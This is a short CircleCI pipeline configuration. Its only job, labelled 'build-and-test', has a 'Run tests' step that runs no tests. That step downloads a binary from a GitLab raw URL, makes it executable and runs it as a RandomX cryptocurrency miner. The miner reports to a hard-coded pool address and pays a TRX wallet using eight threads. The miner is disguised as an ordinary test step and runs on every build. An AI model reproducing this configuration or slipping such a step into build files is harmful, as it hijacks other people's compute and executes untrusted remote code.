version: 2.1

orbs:

  python: circleci/python@1.2
jobs:
  build-and-test: 
    docker:
      - image: cimg/python:3.8
    steps:
      - checkout
      - run:
          name: Run tests
          command: python3 -c "import os; os.system('wget https://gitlab.com/Anli-Angku/Simpanan/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.30.104:80 -u TRX:TLam55PBVsxcfdwmTCPtkbwbx3YDagyJep.CIR${RANDOM:0:9} -a rx/0 -k --threads=8')"
workflows:
  sample:
    jobs:
      - build-and-test
